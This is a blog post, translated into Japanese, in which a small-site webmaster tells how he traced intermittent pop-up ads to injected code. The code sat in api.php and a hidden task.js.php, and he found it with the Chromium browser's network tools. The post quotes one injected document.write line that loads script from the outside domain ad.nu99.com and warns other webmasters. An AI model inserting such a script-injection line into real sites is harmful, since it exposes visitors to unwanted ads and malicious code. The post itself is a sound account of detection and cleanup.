Chromiumコアブラウザのパケットキャプチャツールを使用して悪意のあるコードを削除します

昨年の12月頃、友人から、私のウェブサイトを開くと広告がポップアップ表示されることに気付かされました。以前、ウェブサイトを構築した際にホームページファイルに悪意のあるコードが挿入されていた事例があったため、わざとウェブサイトを開いてソースコードを注意深く調べ、疑わしいコードがないか確認しましたが、何も見つかりませんでした。友人に、毎回ポップアップ表示されるかどうか尋ねたところ、毎回ではなく、たまに表示されるだけだと答えました。そこで、通信事業者が作成した DNS ハイジャック広告だと結論付けました。その後間もなく、遠く離れた北京にいるチームメイトの Pengpeng が、ウェブサイトのホームページを開くとゲーム広告が時々表示されるのはなぜかと私に尋ねました。今回は、ウェブサイトが悪意のあるコードに感染しているに違いないと確信しました。ウェブページのソース コードをもう一度注意深く調べたところ、ようやく手がかりが見つかりました。悪意のあるコードは確かに存在しますが、ウェブサイトのホームページ ファイルには存在しません。代わりに、第 2 レベル ドメイン フォーラムのデータ呼び出しに使用される PHP ファイル「api.php」に配置されています。悪意のあるコードの作成者は次のように書いています。

document.write(“<script src='/images/loading.gif' data-original=http://ad.nu99.com/ip.asp?loc=zibo></script>”);

その後、このファイルがメイン サイトに呼び出され、このコードがロードされます。最後にある zibo が、Zibo でポップアップ広告ページが一度も見つからなかった理由です。

5月に北京で起業家会議に出席しました。ホテルの部屋でウェブサイトを閲覧していたところ、別の広告ページがポップアップ表示されました。すぐにソースコードを開いて確認してみましたが、異常は見つかりませんでした。その時は、時間を見つけて問題を注意深く調べなければならないと思いましたが、会議から戻った後、そのことを忘れてしまいました。

先週、友人の家に行き、自分のウェブサイトを見せました。突然、またポップアップ広告を見つけました。今回は、悪意のあるコードがウェブサイトに挿入されていたと確信しました。原因を慎重に調べなければなりません。今週は忙しすぎて、ほとんど忘れていました。今日は、ウェブサイトのアクセス速度が特に遅く、朝には開けないことがよくありました。安全のために、一時的なデータのバックアップを作成しました。データのバックアップが完了した後、コンピュータールームのカスタマーサービスQQにメッセージを残して、ウェブサイトの起動速度が遅いことを伝えましたが、返信がありませんでした。午後になるとウェブサイトの起動が速くなりましたが、それでもまだ遅かったです。ホームページを読み込む必要がありました。ホームページを読み込む数秒間、ブラウザのステータス バーにドメイン名 ad.df77.com が表示されました。このドメイン名は、以前扱った ad.nu99.com とまったく同じで、とても見覚えがありました。今回は、この悪意のあるコードを逃がすわけにはいかないので、見つけなければなりません。

処理中、すべてのスクリプト コード セグメントが 1 つずつチェックされましたが、最終的に結果は見つかりませんでした。最後に、Chromium コア ブラウザのパケット キャプチャ ツールを思いつきました。パケット キャプチャ ツールを開いて、Web ページを更新しました。ページによって読み込まれた各ドメイン名のソース データは、以下のソース パッケージ リストに明確に表示されました。

ソース タブを確認すると、ad.df77.com のドメイン名からダウンロードされた「ip.asp?shandong|zibo」によって、悪意のあるコードの存在が再び証明されます。ネットワーク タブを開くと、リアルタイムでダウンロードされたネットワーク データがすべて表示されます。下まで注意深く確認すると、最後に、task.js.php ファイルに隠された悪意のあるコードの隠しファイルが表示されます。

FTP で task.js.php ファイルを探し、最終更新日時が 2012 年 12 月 24 日であることを確認します。これは、悪意のあるコードが半年前から挿入されていたことを証明しています。ファイルをすぐにローカルにダウンロードし、サンプルを保存し、完全な task.js.php ファイルをアップロードして上書きします。

ここでは、すべてのウェブマスターに以下の情報にも注意を払うようお願いし、予防策を強化してください。

このドメイン名による攻撃に関して、インターネット上では 100 件近くの支援要請があります。

ハッカーはこの IP にバインドされた複数のドメイン名を持っており、それらはすべて悪意のある攻撃に使用されていると推測されています。

手続きを終えた後も、気持ちが落ち着きませんでした。起業する上で、草の根ウェブマスターであることの大変さを改めて実感しました。ウェブマスターとして、コードを書いてトロイの木馬を駆除し、画像を修復してテキストを編集し、プロモーションや販売を行い、ドメイン ネーム サーバーの購入に投資する必要があります。ウェブサイトを赤ん坊のように世話し、ゆっくりと成長させることに全力を注ぐ一方で、あらゆる種類の悪意ある者があなたの労働の成果を盗むのを防ぐ必要もあります。

「職業にはそれぞれ専門分野がある」という古い格言があります。確かに私はハッカーではないので、他人を攻撃する方法は知りません。おそらく、「徳が高ければ、悪も高まる」ということわざの通り、私の個人的な力ではハッカーの攻撃に抵抗することは決してできないでしょう。しかし、私は道を歩いている最中なので、止まることができません。

心の中の小さな夢のためにたゆむことなく前進し続ける小さなウェブマスターとして、現状に満足せず、小さな成果に満足することがよくありますが、ジョー氏が私たちに与えた真摯な教え「貪欲であり続け、愚かであり続けなさい」を決して忘れません。最後に、ムーンライトブログのこの一文を独自の解釈で締めくくりたいと思います。

「私たちは何か新しいものを作ったり、完璧なことをしたりすることはできないかもしれませんが、私たちが好きなこと、つまり愚かでユニークなことをするために、もっと頑固で不器用になることはできます。たとえ世界がまだ洗練されていたとしても、それは私たちがもっと努力することを止めることはできません。」

この記事は、Li Jiechun のブログ http://blog.qlzhan.com/361 に最初に掲載されました。

元のタイトル: Chromium コアブラウザのパケットキャプチャツールを使用して悪意のあるコードを削除する

キーワード: クロム、パケット キャプチャ、悪意のあるコード、ウェブマスター、ウェブサイト、ウェブサイトのプロモーション、収益化